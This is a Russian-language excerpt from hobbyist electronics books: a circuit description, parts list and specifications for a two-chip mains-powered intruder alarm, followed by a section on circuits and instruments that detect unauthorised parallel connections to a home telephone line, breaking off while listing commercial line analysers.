На рис. 3. 15 приведена принципиальная электрическая схема сторожевого устройства на двух микросхемах и семи транзисторах. Схема обладает высокой степенью универсальности, очень проста по составу комплектующих ЭРИ и ЭРЭ и легко читается.
Электронное сторожевое устройство включает в свой состав входные электрические цепи питания, сетевой понижающий трансформатор питания 77 унифицированной конструкции из серии «Габарит», выпрямительное устройство с емкостным фильтром, сигнальную цепь, электронный управляющий блок и выходные сигнальные цепи.
К сети переменного тока устройство подключается с помощью электрического соединителя XI типа «вилка» и электрической штепсельной розетки, рассчитанной на прохождение тока нагрузки до 6 А. Включается и выключается устройство с помощью однополюсного переключателя S1. На входе питающей сети установлен плавкий предохранитель F1, защищающий входные цепи от коротких замыканий и перегрузок, которые могут возникнуть из-за ошибок при сборке и монтаже и при неправильном включении первичных обмоток трансформатора.
Неоновая лампочка H1 тлеющего разряда сигнализирует о готовности устройства к эксплуатации. При включении устройства в сеть и замыкании контактов переключателя S1 лампочка H1 загорается, что свидетельствует о подаче переменного напряжения на первичную обмотку сетевого трансформатора. Конденсаторы С9 и С10, включенные на входе параллельно первичной обмотке трансформатора, защищают устройство от низкочастотных помех, проникающих к сеть питания переменного напряжения.
Сетевой понижающий трансформатор питания Т1 броневой конструкции изготавливается на магнитопроводе из электротехнической стали марки 3312 толщиной от 0, 2 до 0, 5 мм типоразмера ШЛМ 25Х32 с уменьшенным расходом меди. Унифицированный трансформатор имеет две разнесенные первичные обмотки и шесть вторичных обмоток с соответствующими обозначениями. На рис. 3. 15 показано подключение трансформатора к сети неременного тока напряжением 220 В. Для того чтобы включить устройство в сеть с напряжением 127 В, необходимо соединить выводы обмоток 1 и 6, 4 и 9, а напряжение 127 В подать на выводы 1 и 4 (6 и 9). На вторичных обмотках унифицированного трансформатора действуют следующие неременные напряжения: на выводах 11 и 12 — напряжение 5 В; 13 и 14 — 5 В; 15 и /б — 10 В; 17 и 18 — 10 В; 19 и 20 — 2,6 В; 21 и 22 — 2,6 В под нагрузкой. Номинальное значение тока на вторичной обмотке трансформатора не превышает 0,88 А. Вместо унифицированного покупного трансформатора можно применить самодельный трансформатор, который изготавливается по данным, приведенным в табл. 3.14.
Сетевой понижающий трансформатор Т1 обеспечивает расчетный уровень выпрямленного напряжения постоянного тока на выходе, полную гальваническую развязку вторичных цепей устройства от высокого напряжения переменного тока первичной сети и дополнительную электробезопасность при эксплуатации сторожевого устройства с низким напряжением на выходе вторичных обмоток.
Выпрямительное устройство собрано по двухполупериодной схеме со средним выводом вторичной обмотки на двух выпрямительных диодах малой мощности и работает на емкостный фильтр, выполненный на оксидном конденсаторе С1. Выпрямитель по такой схеме характеризуется невысоким уровнем пульсации выпрямленного напряжения, уменьшенным количеством примененных выпрямительных диодов и достаточно высоким обратным напряжением, действующим на комплекте выпрямительных диодов. Применяется выпрямитель со средней точкой в устройствах малой и средней мощности нагрузки.
Сторожевое устройство работает следующим образом. После замыкания контактов переключателя S1 и включения электропитания напряжение начинает поступать на
Таблица 3.14. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в сторожевом устройстве на двух микросхемах
сетевой понижающий трансформатор Т1 и загорается индикаторная лампочка H1, само сторожевое устройство при замкнутых контактах конечных выключателей В1 переходит в дежурный режим работы. К контактам Х2 и ХЗ можно подключить практически любое количество контактных групп и конечных выключателей. Использование ИМС в режиме ожидания дает значительный выигрыш в потреблении электроэнергии, которая не расходуется в периоды времени от момента автоматического включения до момента следующего включения. Примененные в сторожевом устройстве микросхемы серии К561ЛА7 относятся к параметрическому ряду ИМС, состоящих из комплекса микромощных микросхем второй и третьей степени интеграции на транзисторах, выполненных поспециальней технологии, и характеризуются жесткими требованиями к потребляемой энергии, массе, габаритным размерам в условиях значительного изменения напряжения питания при работе от одного источника. Диапазон напряжений электропитания микросхем серии К561 лежит в пределах от 3 до 15 В, допустимый уровень пульсации напряжения постоянного тока не превышает 0,2 В. Минимальное напряжение высокого уровня логической единицы на выходе микросхемы: 3, 6 В при напряжении питания 5 В и 7, 1 В при напряжении 10 В. Максимальное напряжение низкого уровня логического нуля на входе микросхемы: 1, 4 В при напряжении питания 5 В и 2, 9 В — при 10 В. Для нормальной работы микросхемы длительность фронтон входных импульсов должна быть не более 10, 5 и 1 мкс при напряжении питания 5, 10 и 15 В.
В соответствии с принятой классификацией ИМС БИС функциональный состав микросхемы с обозначением ЛА7 включает в себя четыре логических элемента 2И-НЕ. В данном случае два элемента каждой микросхемы являются таймерами, работающими в общей схеме управления.
При замкнутых контактах выключателя В1 таймеры микросхемы не работают. В это время на выходе третьего элемента второй ИМС DA2 (вывод 10) действует высокий уровень логической единицы, а это значит, что на обоих входах третьего элемента ИМС DA1 (выводы 8 и 9) также действует высокий уровень логической единицы.
При размыкании контактов переключателя В1 на входе третьего элемента ИМС DA1 (вывод 9) через резистор R3 появляется низкий уровень логического нуля, а его выход (вывод 10) переходит в состояние высокого уровня логической единицы. Включенные в схему резистор R3 и конденсатор С2 обеспечивают защиту устройства от ложных сигналов срабатывания, возникающих в результате электромагнитных наводок в соединительных цепях. После того как на выходе третьего элемента ИМС DA1 (вывод 10) появляется высокий уровень логической единицы, открывается транзистор VT2. Время открывания транзистора зависит от емкости конденсатора С5 и сопротивления резистора R12. Открывание транзистора VT2 приводит к разрядке конденсатора С4 и к срабатыванию первого таймера, собранного на первых двух элементах ИМС DA 1 (выводы 1—6). Для четкого завершения цикла работы первого таймера вход 1 первой ИМС соединен с выходом третьего элемента второй ИМС DA2 (выводы 8 и 9), которые остаются в состоянии логического нуля до тех пор, пока работает таймер. Как только первый таймер завершит свой цикл, выход третьего элемента второй ИМС DA2 (вывод 10) снова переходит в состояние высокого уровня логической единицы, и при этом на короткое время открывается транзистор VT4. Открывание транзистора VT4 обеспечивает запуск второго таймера после зарядки конденсатора С7. Второй таймер собран на двух элементах ИМС DA2 (выводы 1, 2,3 и 4, 5, 6).
С целью создания напряжения электропитания ИМС в устройстве собран параметрический стабилизатор на стабилитроне VD3, транзисторе VT1 и резисторе R2.
Сигнал, снимаемый с выхода второго таймера, преобразуется транзисторами VT3 и VT5 с напряжения 7, 5 В до значения напряжения источника постоянного тока. Транзисторы VT6 и VT7 образуют усилитель мощности, который обеспечивает в свою очередь четкое срабатывание ИМ. В качестве ИМ можно применить электромагнитное реле типа РЭС-10, которое подключается своей обмоткой к электрическим соединителям Х5 и Х6. Контакты этого реле, не показанные на схеме, замыкают соответствующие питающие цепи исполнительных звуковых и световых элементов.
При изготовлении универсального сторожевого устройства использованы следующие покупные комплектующие ЭРИ и ЭРЭ: ИМС DA1 типа К561ЛА7, DA2 — К561ЛА7; транзисторы VT1 типа КТ3102Д, VT2 — КТ3102Д, VT3 — КТ3102Д, VT4 — КТ3102Д, VT5 — КТ3102Д, VT6 — КТ3107Б, VT7 — КТ933Б;
стабилитрон VD3 типа Д814А; выпрямительные диоды VD1 типа КД204В, VD2 — КД204В, VD4 — КД521А, VD5 — КД521А, VD6 — КД521А, VD7 — КД521А, VD8 — КД521А, VD9 — КД521А, VD 11 — КД223; светодиод VD10 типа АЛ307А;
сетевой понижающий трансформатор питания Т1 унифицированной конструкции типа ТНП258-127/220-50; индикаторная лампочка H1 ТH-0,2-1; конденсаторы С1 типа К50-6-50В-200 мкф, С2 — К53-1А-20В-22 мкФ, СЗ — К73-17-63В-1 мкФ, С4 — К73-17-63В-1 мкф, С5 — КМ-5-50В-0. 1 мкФ, С6 — К73-17-63В-1 мкФ, С7 — К73-17-63В-1 мкФ, С8 — КМ-5-50В-0. 1 мкФ; резисторы R1 типа ВСа-2-200 кОм, R2 — ВСа-0, 5-2, 2 кОм, R3 -ВСа-0, 5-5, 6 кОм, R4 — ВСа-0, 25-10 МОм, R5 — ВСа-0, 25-10 кОм, R6 — ВСа-0, 25-330 кОм, R7 — ВСа-0, 25-1 МОм, R8 — ВСа-0, 25-10 МОм, R9 — ВСа-0, 25-10 кОм, R10 — ВСа-0, 25-1 МОм, R 11 — ВСа-0, 25-2, 2 МОм, R12 — ВСа-0, 25-10 кОм, R13 — ВСа-0, 25-22 кОм, R14 — ВСа-0, 5-22 кОм, R 15 — ВСа-0, 25-10 кОм, R16 — ВСа-0, 25-22 кОм, R 17 — ВСа-0, 25-10 кОм, R 18 — ВСа-0, 25-22 кОм, R19 — ВСа-0, 25-1, 8 кОм; плавкий предохранитель F1 типа ПМ-1-1А с держателем предохранителя; переключатели S1 типа П1Т-1-1, S2 — КМ1-1; электрические соединители X1 типа «вилка», Х2, ХЗ — КМЗ-1.
При изготовлении, регулировке, настройке и ремонте сторожевого устройства некоторые комплектующие изделия и ЭРЭ можно заменить без ухудшения основных электрических параметров и эксплуатационных характеристик. Например, резисторы типа ВСа можно заменить любыми постоянными резисторами типа МЛТ, ОМЛТ, МТ, УЛИ, Cl-4, C2-8; конденсаторы типа К73-17 — на К73-16, К73-11, К78-2, конденсаторы типа КМ-5 — на К10У-5, К10-17, КМ-6; выпрямительные диоды типа КД521А — на КД509А, Д220, Д220А, Д220Б, Д312; транзистор типа КТ3102Д — на КТ3102Е, КТ3107Е, КТ3107Ж, транзистор типа КТ933Б — на КТ939А, КТ644А, ГТ906АМ; ИМС типа К561ЛА7 — на 564ЛА7.
Основные электрические параметры и технические характеристики сторожевого устройства на двух микросхемах
Номинальное напряжение питающей сети
переменного тока, В.................... 220 или 127
Номинальная частота питающей сети переменного тока, Гц................... 50
Номинальное напряжение автономною источника
питания постоянного тока, В............... 12
Пределы изменения напряжения питающей сети переменного тока, В.................... 180... 240 или
110... 140 Пределы изменения частоты питающей сети переменного тока, Гц................... 49, 5... 50, 5
Пределы изменения напряжения автономного источника питания постоянного тока, В....... 9... 14
Коэффициент нелинейных искажений питающей сети переменного тока, %, не более............. 12
Время срабатывания системы, мс, не более...... 0, 2
Время задержки подачи сигнала тревоги после срабатывания системы, с............. 3... 30
Время подачи сигнала тревоги, мин........... 1... 10
Количество одновременно охраняемых объектов, шт. 1... 20 Сопротивление шлейфа, кОм, не более......... 10
Сопротивление изоляции токоведущих контактных групп и проводников устройства, подключающих конечные выключатели, МОм, не менее.............. 10
Помехозащищенность устройства от ложных срабатываний при воздействии внешних электромагнитных помех, дБ, не менее........ 100
Напряжение переменного тока на выводах обмоток сетевого трансформатора 77, В:
2 и 4............................. 110
7 и 9............................. 110
11 и 12........................... 5
13 и 14........................... 4, 95
15 и 16............................ 10
17 и 18........................... 10
19 и 20........................... 2, 6
21 и 22........................... 2, 6
Номинальное напряжение питания ИМС, В...... 7, 5
Максимальная выходная мощность сетевого
трансформатора питания 77, Вт........... 30
Срок службы, ч, не менее.................. 10 000
Вероятность безотказной работы сторожевого
устройства при риске заказчика в=0, 92, не менее 0, 98
кпд, %, не менее........................ 96
Условия эксплуатации:
температура окружающей среды, °С........ —25...+ 40
относительная влажность воздуха при температуре
окружающей среды 25°С, %, не более...... 90±3
атмосферное давление воздуха, мм рт. ст..... 200... 1000
Рис. 3.15. Принципиальная схема сторожевого устройства на двух микросхемах.
Литература
Векслер Г. С.Расчет электпитающих устройств. Киев: Техника, 1978.—207 с.
Вересов Г. П. Электропитание бытовой радиоэлектронной аппаратуры.— М.: Радио и связь, 1983.— 128 с.
Верховцев О. Г., Лютое К. П. Практические советы мастеру-любителю: Электроника. Материалы и их применение.—3-е изд., перераб. и доп.—СПб.: Энергоатомиздат. СПб. отделение, 1991.—272 с., ил.
Сидоров И. Н., Скорняков С. В. Трансформаторы бытовой радио электронной аппаратуры: Справочник.—М.: Радио и связь, 1994.— 320 с., ил.—(Массовая радиобиблиотека; вып. 1186).
Справочная книга радиолюбителя-конструктора / А. А. Бокуняев, Н. М. Борисов, Р. Г. Варламов и др.; Под ред. Н. И. Чистякова.— М.:
Радио и связь, 1990.—624 с., ил,—(Массовая радиобиблиотека; вып. 1147).
Справочник конструктора РЭА: компоненты, механизмы, надежность / Н. А. Барканов, Б. Е. Бердичевский и др.; Под ред. Р. Г. Варламова.—М.: Радио и связь, 1985.—384 с.
Терещук Р. М. и др. Полупроводниковые приемоусилительные устройства: Справочник радиолюбителя / Р. М. Терещук, К. М. Терещук, С. А. Седов.— 4-е изд., стер.— Киев: Наук. думка, 1989.— 800 с., ил.— Библиогр.: с. 795—800.
Устройства электропитания бытовой РЭА: Справочник / И. Н. Сидоров, М. Ф. Биннатов, Е. А. Васильев.—М.: Радио и связь, 1991.—472 с., ил.
Шленциг К., Штаммлер В. Самодельные электронные устройства в быту: Пер. с нем.—М.: ДОСААФ, 1984.— 144 с., ил.
Раздел 3.
1. Основные определения и классификация способов подключения и защиты.
2. Организационные способы защиты от телефонного пиратства.
3. Устройства пассивной технической защиты.
3.1. Способы получения информации о подключении
Основные технические способы получения информации о постороннем включении в линию базируются на следующих признаках:
• отсутствие напряжения в телефонной линии;
• падение напряжения в линии в 3-4 раза при положенной трубке основного ТА;
• наличие импульсов набора номера при положенной трубке ТА;
• наличие частотных посылок DTMF кода при неиспользовании основного ТА;
• непрохождение вызова с АТС на основной ТА.
Большинство отечественных АТС имеют рабочее напряжение 60 В постоянного тока. Для индикации состояния линии с успехом может быть применена схема, приведенная на Рис.5.
Данная схема позволяет отследить:
• падение напряжения в линии до уровня 35В;
•наличие импульсов набора номера частотой 10 Гц;
• наличие вызывного сигнала частотой 25 Гц;
• пропадание напряжения в линии (при наличии независимого источника питания микросхемы DD1.1.
В состав схемы входят:
• мост униполярного подключения — VD 1 -VD4;
• специальный делитель контроля падения напряжения — VD5, Rl, VD6, R2;
• переключающий элемент И-НЕ —DD 1.1.
Сочетание в делителе резистивных (Rl, R2) и нелинейных элементов (в частности, стабилитрона VD6) позволяет подключить элемент DD1.1 непосредственно к линии, а также получить порог переключения элемента DD1.1 не ниже 35 В. В результате, данная схема может уверенно отработать падение напряжения как при установке у абонента, так и при установке на кроссе АТС. Рис. 6 поясняет сказанное.
Следует учитывать, что для отдаленных от АТС абонентов эквивалентное сопротивление линии может составлять Rэкв ~ 1 кОм, что затрудняет работу устройства индикации, включающего только резистивный делитель (без стабилитрона), вследствие большой разницы в уровнях напряжений на коротком (Rэкв = 0) и длинном (Rэкв > 500 Ом) шлейфе.
Схема на Рис. 5 свободна от этих недостатков и применяется в различных устройствах индикации и защиты. Очевидно, что с помощью данной схемы невозможно принять DTMF-посылки набора номера, но сам момент снятия трубки на пиратском аппарате регистрируется однозначно, что позволяет использовать данную схему во всех режимах подключения.
В дополнение на Рис. 7 приведена схема индикатора состояния линии с использованием транзистора. В данной схеме используется обычный резистивный делитель Rl, R2. В качестве ключа применяются кремниевые транзисторы
КТ3102 или КТ315. Подбор уровня срабатывания осуществляется изменением R2 при настройке схемы. Обычно он не превышает 30 В и позволяет регистрировать те же режимы, что и схема на Рис. 5.
3.2. Совмещенный индикатор подключения и обрыва телефонной линии
В соответствии с описанным выше способом контроля напряжения в линии разработан совмещенный индикатор подключения и обрыва линии [2]. Схема приведена на Рис.8.
В состав схемы входят:
• Диодный мост для подключения линии без учета полярности—VD1-VD4;
• Датчик напряжения — VD5, R1, VD6, R2, VD7, С1,DD1.1;
• Фильтр вызова АТС, 25 Гц, — R3, С2, DD1.2;
• Инверторы — DD1.3, DD2.2;
• Генератор 2.5 кГц — DD1.4, DD2.1, R4, СЗ;
• Ключ—R5,VTl;
• Звукоизлучающий элемент — пьезоизлучатель ЗП-3.
Принцип работы схемы заключается в следующем. В исходном состоянии блок индикатора подключается параллельно используемому телефонному аппарату. При наличии в линии напряжения свыше 40 В на входе элемента DD1.1 присутствует уровень логической единицы, и, в соответствии с этим, генератор 2.5 кГц заперт.
При поступлении вызова с АТС амплитудой 100 В и частотой 25 Гц специально расчитанная цепочка фильтра R3, С2 не позволяет переключить элемент DD1.2 и включить звукоизлучатель ЗП. Если же на каком-то участке линии была снята трубка (либо произошел обрыв) более чем на 1 сек., на входе DD1.1 появится нулевой уровень, и с указанной задержкой переключится DD1.2. Далее включится генератор 2.5 кГц, звукоизлучатель ЗП подаст непрерывный звуковой сигнал, сигнализирующий об использовании или обрыве линии. При возвращении линии в исходное состояние (напряжение более 40 В) индикатор вновь переходит в ждущее состояние. Возможна доработка индикатора триггерной схемой для индикации попытки использования (обрыва) линии и после установления в линии номинального напряжения.
Питание индикатора встроенное — батарея 9 В ("Крона", "Корунд"...).
Благодаря высоким значениям Rl, R2, индикатор абсолютно не влияет на параметры линии в соответствии с ГОСТом. Естественно, что индикатор будет срабатывать и при подъеме трубки (ведении разговора) и самим хозяином линии. Можно порекомендовать встроить выключатель или выполнить индикатор в виде заглушки, подключаемой вместо телефонного аппарата.
3.3. Световой индикатор с автоматическим отключением
Для того, чтобы индикатор подключения не срабатывал при снятии трубки хозяином телефонной линии, необходимо ввести режим автоматического отключения. В этом случае индикатор включается последовательно с телефонным аппаратом через датчик тока. Принципиальная схема такого устройства приведена на Рис. 9.
В состав схемы входят:
• датчик напряжения — VD1, R1, VD2, R2, DD1.1;
• датчик тока — R5, VT2, R6, DD1.2;
• ключ включения светодиода — R3, VT1,R4,
HL1;
• схема автоматического отключения — R7, С1, DD1.3,VD3;
• элемент питания 9 В.
Принцип действия индикатора заключается в следующем.
Светодиод HL1 загорается в случаях:
• снижения напряжения в линии ниже 35В (попытка нелегального подключения);
• обрыва телефонной линии;
• прохождения сигнала вызова АТС — 25 Гц. Включение ключа VT1 происходит высоким уровнем с выхода 3 DD1.1 через R3. При снятии трубки телефонного аппарата с задержкой ~1с (определяется R7,C1) переключается элемент DD1.3 и принудительно поддерживает "0" на базе VT1, отключая тем самым HL1. Если кроме световой сигнализации в схему введена звуковая, она также будет выключаться при снятии трубки основного защищаемого ТА.
3.4. Автоматический сигнализатор со звуковой индикацией
Еще один вариант индикатора подключения к линии с автоматическим отключением во время разговора хозяина телефона приведен в [3].
Сигнализатор устанавливается на входе абонентской линии в квартиру последовательно с защищаемым телефонным аппаратом. Благодаря внешнему источнику питания 9 В, сигнализатор реагирует, как на попытку параллельного набора, так и на обрыв линии.
Принципиальная схема устройства приведена на Рис. 10.
В состав схемы входят:
• датчик падения напряжения — VD1, VD2, R2, VT2;
• датчик тока—Rl,VD3,VD4,VTl;
• ключ включения звукового генератора — DA1;
• блокировочная емкость — С 1;
• генератор — VT3, VT4, R4;
• источник питания 9 В ("Крона") — GB 1;
• телефонный капсюль ТА56М — BF 1.
Принцип действия схемы заключается в следующем.
При положенной трубке напряжение в линии составляет 60 В, которого достаточно для открывания стабилитронов VD1, VD2. Транзистор VT2, соответственно, открыт, а ключ DA1 закрыт ("0" на управляющем входе 1, 8 DA1).
При снижении напряжения в линии в два раза стабилитроны VD1, VD2 закрываются и, соответственно, закрывается VT2, а ключ DA1 открывается через резистор R3, замыкая, тем самым, цепь питания звукового генератора, собранного на VT3, VT4.
Если трубка была поднята на своем телефоне (основной ТА), через резистор R1 протекает ток достаточный, чтобы открыть транзистор VT1 и закрыть VT2, DA1. Сигнала тревоги нет. Блокировочный конденсатор С1 необходим для того, чтобы устройство не срабатывало при наборе номера.
После окончания разговора с пиратского аппарата (трубка положена) звуковой генератор отключается практически мгновенно.
3.5. Индикатор нерезонансного включения
Как уже отмечалось, под резонансной настройкой телефонного аппарата понимается работа оборудования АТС с конкретным телефонным аппаратом. В случае подключения телефона с другими характеризующими его параметрами или подсоединении в другой точке шлейфа АТС - абонент, происходит рассогласование (непопадание в резонанс), что приводит к срабатыванию индикатора.
Характеризующие параметры могут быть следующими:
• эквивалентное сопротивление ТА при поднятой трубке;
• эквивалентное сопротивление при положенной трубке;
• индивидуальные параметры номеронабирателя;
• комплексное сопротивление разговорной части;
• ток потребления при вызове;
• ток потребления в разговорном режиме;
• прочие параметры (распределение зарядов, изменение волнового сопротивления двухпроводной линии при включении ТА и др.).
Рассмотрим простейший случай настройки в резонанс по эквивалентному сопротивлению ТА при поднятой трубке.
На Рис. 11 приведена эквивалентная схема пиратского подключения в различных зонах.
R — последовательное включенные эквивалентные сопротивления, имитирующие длинный шлейф АТС-абонент;
Rr — поднятая трубка основного телефона;
Rn — поднятая трубка пиратского телефона;
КТ1-КТ4 — возможные точки подключения пиратского аппарата в различных зонах. Совершенно очевидно, что суммарное сопротивление Rcум = 6*R +Rт однозначно определяет падение напряжения на выходных клеммах АТС (в точках КТ1), это нулевой уровень настройки Ео.
Изменение типа телефонного аппарата ведет к изменению Rт, а значит, к изменению тока питания телефона, соответственно, к колебаниям Ео. Подобные изменения тем значительнее, чем короче длина шлейфа (меньше значение R). В свою очередь, подключение
пиратского аппарата в точках КТ1-КТ4 ведет к резкому изменению Rсум. Для различных зон Rсум будет следующим.
Зона 1 — Rсум1 =Rп Зона 2 — Rсум2 = 2*R +Rп Зона 3 — Rсум3=4*R + Rп 3oнa4—Rсум4 =6*R+Rп
Как видно, изменения довольно значительные (заметим, что порядок значений R, Rт, Rп составляет около 500 Ом). В результате анализа схемы выясняется замечательная возможность — по падению напряжения в линии на выходных клеммах АТС судить о зоне включения пиратского аппарата. Естественно, система требует настройки. На Рис. 12 приведена принципиальная схема датчика нерезонансного подключения с индикацией зоны.
Датчик включается в точках КТ1 шлейфа. В нем предусмотрена светодиодная сигнализация зоны подключения.
В состав схемы входят:
• диодный мост униполярного подключения VD1-VD4;
• делители по зонам — R1, R5; R2, R6; R3, R7;
R4, R8;
• триггеры шмитта (в качестве пороговых элементов) — DD 1.1 -DD 1.4;
• ключи включения светодиодов HL1-HL4 — VT1-VT4;
• источник питания 9 В.
Принцип действия схемы очевиден и прост. При включении ТА в линию на различных участках шлейфа (четыре зоны) на входе устройства формируется, соответственно, один из четырех уровней напряжения Ео — U1, U2, U3, U4. Численные значения этих уровней были выявлены в результате экспериментов на длинном шлейфе реальной телефонной линии при подключенном стандартном ТА.
Настройка схемы производится следующим образом.
Параллельно индикатору включается вольтметр и переменное сопротивление R-настр (показано пунктиром). Регулировкой Rнастр добиваются показаний вольтметра 20 В и далее резистором R5 находят точку включения HL1 (зона 1). Далее, получают напряжение 25 В и резистором R6 включают светодиод HL2 (зона 2) и т.д.
При такой настройке при снятии трубки основного ТА будут загораться несколько светодиодов (в зависимости от зоны включения). Если аппарат включен в зоне 4, будут гореть все светодиоды, в зоне 3 — 3 светодиода и т.д.
Данная схема должна рассматриваться скорее как простейший вариант резонансного датчика.
Некоторые цифровые АТС позволяют запрограммировать работу абонента с определенным ТА (идентификация по цифровому коду), что также можно рассматривать как способ "цифровой резонансной настройки".
3.6. Счетчик времени разговора
Если совместить схему индикатора состояния линии с электронными часами, можно получить простои счетчик времени разговора. Заметим, что если индикатор линии реагирует как на попытку набора, так и на обрыв линии, то счетчик позволит произвести оценку времени пиратского
подключения во время отсутствия хозяина телефона. Получается своеобразный индикатор с памятью.
Привязку датчика состояния линии с часами легче всего производить по запуску кварцевого задающего генератора. Тогда, часы запускаются при падении напряжения в линии ниже установленного уровня (разговор или обрыв) и останавливаются после восстановления уровня 60 В (окончание разговора).
Если часы не обнулять, то счетчик времени суммирует время всех разговоров в течение суток и более (до 24-х часов разговорного времени). Счетчик времени может быть также применен для анализа частоты использования телефонного аппарата.
Для примера, на Рис. 13 представлена схема счетчика времени разговора с задающим генератором на микросхемах 561 серии.
В исходном состоянии, когда на линии 60 В, вход 1 DD2.1 шунтируется диодом VD9 на корпус. Задающий генератор выключен, счет часов остановлен. При снятии трубки на линии, на выходе 10 DD1.3 с задержкой в 1 с (R4, С1) появляется логическая единица, осуществляя запуск генератора. Счет времени осуществляется пока на выходе 10 DD1.3 не появится логический "ноль" (через 1 с после появления на линии напряжения 60 В).
По описанному принципу можно осуществить сопряжение датчика линии с любыми другими схемами электронных часов. Для конструирования желательно использовать готовые часы с питанием от батареек, так как в этом случае осуществляется страховка от пропадания напряжения в сети 220 В.
3.7. Схема запуска счетчика времени для фиксирования исходящей связи
Предыдущая схема (Рис. 13) предусматривала срабатывание счетчика времени во всех режимах связи:
• обрыв линии;
• попытка пиратского подключения;
• использование телефона хозяина линии при исходящей связи;
• входящая связь.
В случае, когда абонент желает контролировать лишь время исходящей связи с основного телефонного аппарата. для запуска кварцевого генератора часов следует применять схему, приведенную на Рис. 14.
В состав схемы входят:
• датчик тока—R1,VТ1,R2,DD1.1;
• фильтр индукторного вызова — R4, СЗ;
• формирователь импульса цифры номера — VD3,R5,C2,DD1.2,C5;
• счетчик набранной цифры — DD2;
• инвертор включения генератора — DD1.4;
• цепь питания микросхем — VD 1, R3, С 1, VD2.
Данная схема позволяет:
• включить счетчик времени после снятия трубки и набора первых 3-х цифр номера (исходящая связь);
• выключить счетчик после окончания разговора (погрешность 2-4 с);
• исключить отсчет времени в случае входящей связи (номер не набирался), а также при параллельном подключении к линии.
Работа схемы заключается в следующем. При снятии трубки на ТА срабатывает датчик тока Rl, VT1 и с запаздыванием в 1 с (фильтр вызова) элемент DD2 подготавливается к счету. Элемент счетчика DD2 считает количество набранных цифр номера. Формирователь R5, С2, DD2.1 переключается в межсерийной паузе набора номера. После первых трех цифр высокий уровень на выходе 7 DD2 останавливает счет и, заряжая С4 через R7, переключает DD1.4, включая тем самым электронные часы. При входящей связи микросхема DD2 также подготавливается к счету, но импульсы набора номера в этом режиме отсутствуют. Электронные часы остаются в выключенном состоянии.
Таким образом, схема запуска позволяет избирательно отслеживать исходящую связь только с подключенного к ней телефонного аппарата.
3.8. Специализированные анализаторы телефонных линий
В состав оборудования помещений кроссов АТС входят испытательно-измерительные столы (ИИС), предназначенные для производства эксплуатационных измерений и испытаний абонентских линий, телефонных аппаратов, абонентских комплектов АТС и соединительных проводов [4].
Оборудование ИИС для электромеханических станций можно разделить на пять основных частей:
• подключающее устройство для подключения ИИС к проверяемой соединительной (абонентской) линии;
• испытательная часть для определения
исправности абонентской линии, телефонного аппарата и абонентского комплекта АТС;
• измерительная часть для эксплуатационных измерений электрических параметров линии и ТА на постоянном токе;
• служебная часть для приема заявок и ведения разговора с абонентом и персоналом АТС;
• переговорное устройство для набора номера, приема и передачи разговора, используемое совместно с испытательной и служебной частью.
Ниже указаны технические возможности ИИС.
Подключающее устройство
Подключающее устройство позволяет осуществлять подключение ИИС к проверяемой линии либо с помощью приборов автоматической установки данных, путем набора номера проверяемого ТА, либо в кроссе с помощью испытательных шнуров. Автоматическое подключение возможно только к абонентским линиям, а с помощью шнуров — к любым соединительным линиям.
Испытательная часть
Испытательная часть ИИС позволяет:
• вызывать абонента, у которого положена трубка, индукторным током;
• вызывать абонента, у которого снята трубка, фоническим сигналом нарастающей громкости;
• контролировать прохождение установления
соединения и разговора по проверяемой линии;
• вызывать по проверяемой линии станцию и
набирать любой номер;
• вести переговоры по проверяемой линии как в сторону линии, так и станции;
• проверять качество разговорных цепей ТА путем введения в разговорный тракт во время разговора искусственной линии с затуханием 26 дБ;
• проверять правильность работы
номеронабирателя ТА, включенного в линию.
Измерительная часть
Измерительная часть позволяет:
• измерять омическое сопротивление шлейфа абонентской и соединительной линий (как двух, так и трехпроводной);
• измерять сопротивление изоляции между проводами А и Б абонентской линии, а также между любым проводом и землей в пределах до 1-10Ом;
• проверять наличие на проводах линии посторонней полярности путем измерения сопротивления изоляции между каждым проводом и минусом батарей АТС;
• проверять целостность конденсатора в телефонном аппарате абонента;
• проверять исправность защитных предохранителей кросса.
Структурная схема испытательно-измерительного стола приведена на Рис. 15.
В целом, ИИС позволяет проверить телефонную линию на предмет самовольного подключения во всех режимах работы телефонного аппарата. Электронные АТС последнего поколения имеют богатый набор сервисных функций, поэтому обнаружение нелегальных подключений значительно упрощается. Естественно, такую работу могут выполнить только работники АТС.
Представляется интересным, использовать для контроля линии приборы, разработанные специально для защиты информации [5]. Из всего объема данных, полученных с помощью таких специализированных тестеров, необходимо выбрать те, которые указывают на факты подключения к линии различных устройств, обрывы линии и т.п.
Для примера приведем некоторые характеристики таких приборов.
Набор для обнаружения PK1220-S
PK1220-S используется для незаметной проверки текущего состояния телефонной линии после установки устройства, например, когда линия свободна, идет разговор и звенит звонок. Это устройство работает по автоматической тестирующей программе, включающей отраженное, фазовое, угловое, I/U и высокочастотное измерение. Во время отраженного измерения любое подключение видно на встроенном мониторе с помощью измерительного сигнала на телефонной линии. Во время фазового углового измерения показывается любое РhТ-отклонение, происходящее от мощностного, индуктивного или реального оттока. РhТ-отклонение показывается с точностью 0,1%. Если предопределенный уровень превышен, PK1220-S испускает акустический сигнал 30 с. Оптический сигнал тревоги продолжается при интерференции и дальнейшая индикация показывает конец интерференции. Встроенная память тревоги начинает работу, когда регистрируется тревога, и затем хранит информацию о ней. Пользователь может стереть память тревоги. Гарантируется 24-часовая защита против встроенных систем перехвата. При I/U-измерении акустическим или оптическим сигналом показываются дополнительно встроенные элементы. Дополнительный контроль телефонного напряжения возможен с помощью U-измерения, т.к. это измерение отделяет телефонное напряжение от телефонной цепи и телефон работает через PK1220-S. Пользователь также может осуществлять акустоматическое программирование. Устройство может работать независимо от полярности.
Универсальный телефонный анализатор TS-12
Высокочувствительный и точный универсальный телефонный анализатор TS-12 предназначен для тестирования обыкновенных и электронных телефонов и
телефонных систем. Тестирует и обнаруживает все сигналы, даже те, которые исходят от лампочки или звонка вызова. Применяется для 50-проволочной кабельной системы, которая обычно используется вместе с 5-канальными установками. Позволяет проводить такие тестирования, как проверка напряжения при снятой и повешенной трубке, прослушивание линии, колебание тона, тестирование импульса высокого напряжения и различных видов прослушиваний. Все это может быть выполнено за одну минуту.
Быстрое сканирующее устройство DM-9
